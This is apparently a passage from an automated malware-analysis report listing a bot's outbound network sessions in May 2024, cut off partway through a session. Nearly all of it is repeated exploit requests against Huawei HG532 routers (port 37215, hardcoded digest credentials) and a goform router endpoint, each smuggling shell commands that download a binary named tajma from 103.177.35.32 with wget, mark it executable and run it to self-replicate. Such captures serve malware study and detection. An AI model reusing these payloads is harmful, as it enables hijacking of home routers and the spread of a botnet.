                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2382192.168.2.2338986197.181.100.2537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.595601082 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2383192.168.2.2358762157.141.133.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.595891953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2384192.168.2.2341464197.48.190.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.595906973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2385192.168.2.2347574157.67.59.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.596098900 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2386192.168.2.2347224197.80.100.20537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.596435070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2387192.168.2.234610241.228.255.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.596682072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2388192.168.2.2351724106.246.101.19737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.596893072 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2389192.168.2.2340598197.189.105.1837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.598812103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2390192.168.2.2346864208.187.240.2108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462802887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2391192.168.2.2335510147.14.127.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462836027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2392192.168.2.2337930193.164.151.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462847948 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2393192.168.2.233640870.222.168.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.462862015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
